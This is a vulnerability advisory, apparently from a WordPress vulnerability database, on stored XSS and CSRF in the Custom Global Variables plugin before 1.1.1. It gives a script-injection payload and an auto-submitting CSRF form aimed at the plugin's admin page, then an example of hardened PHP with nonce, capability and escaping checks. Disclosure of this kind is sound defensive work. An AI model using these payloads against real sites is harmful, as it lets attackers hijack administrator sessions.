WordPress Plugin Vulnerabilities
Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)
Description
The plugin does not sanitise the 'name' field of the variable added in its settings, leading to a Stored Cross-Site Scripting issue. Attackers could also use the lack of CSRF and capability checks to make a logged-in administrator add the payload and make them perform further unwanted actions.
Proof of Concept
As an administrator, go to the Settings > Custom Global Variables page, add the following payload ("><script>alert(/XSS/)</script><") in the 'name' field, add whatever value in the 'value' field and submit it.

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=custom-global-variables" method="POST">
      <input type="hidden" name="vars[1][name]" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="vars[1][val]" value="a" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
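The controls the description names as missing (capability check, CSRF check, sanitisation of 'name'), plus escaping on output, shown as a hardened save-and-render pair for a settings page of this shape. This is an added example, not the plugin's code or its 1.1.1 fix: the option name, nonce action and cgv_example_* function names are hypothetical, and it assumes variable names are plain identifiers that are echoed back into an input's value attribute.

```php
<?php
// Added example, not the plugin's code. CGV_* and cgv_example_* are hypothetical;
// vars[n][name], vars[n][val] and the page slug come from the proof of concept.
const CGV_OPTION = 'cgv_example_vars'; // hypothetical option name
const CGV_NONCE  = 'cgv_example_save'; // hypothetical nonce action

function cgv_example_save_vars() {
    $page = isset( $_GET['page'] ) ? $_GET['page'] : '';
    if ( 'custom-global-variables' !== $page || ! isset( $_POST['vars'] ) ) {
        return;
    }
    // Capability check: only users who may manage options can save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF check: dies unless the POST carries a valid nonce for this action.
    check_admin_referer( CGV_NONCE );

    $clean = array();
    foreach ( (array) wp_unslash( $_POST['vars'] ) as $row ) {
        if ( ! is_array( $row ) || ! isset( $row['name'], $row['val'] )
            || ! is_string( $row['name'] ) || ! is_string( $row['val'] ) ) {
            continue;
        }
        // Input validation (assumed allow-list): letters, digits, underscore.
        if ( ! preg_match( '/\A[A-Za-z0-9_]+\z/', $row['name'] ) ) {
            continue; // reject the row instead of storing markup
        }
        $clean[] = array(
            'name' => $row['name'],
            'val'  => sanitize_text_field( $row['val'] ),
        );
    }
    update_option( CGV_OPTION, $clean );
}
add_action( 'admin_init', 'cgv_example_save_vars' );

function cgv_example_render_rows() {
    wp_nonce_field( CGV_NONCE ); // emits the hidden _wpnonce field
    foreach ( (array) get_option( CGV_OPTION, array() ) as $i => $row ) {
        // Output escaping also neutralises rows stored before the fix.
        printf(
            '<input type="text" name="vars[%1$d][name]" value="%2$s" /> '
            . '<input type="text" name="vars[%1$d][val]" value="%3$s" />',
            (int) $i,
            esc_attr( $row['name'] ),
            esc_attr( $row['val'] )
        );
    }
}
```

With the nonce check in place, the cross-site form in the proof of concept is rejected before any value is stored, because the submitting page cannot supply a valid _wpnonce for the administrator's session.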
Affects Plugins
References
Exploitdb
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Swapnil Subhash Bodekar
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-01-11 (about 2 years ago)
Added
2021-01-11 (about 2 years ago)
Last Updated
2021-03-10 (about 2 years ago)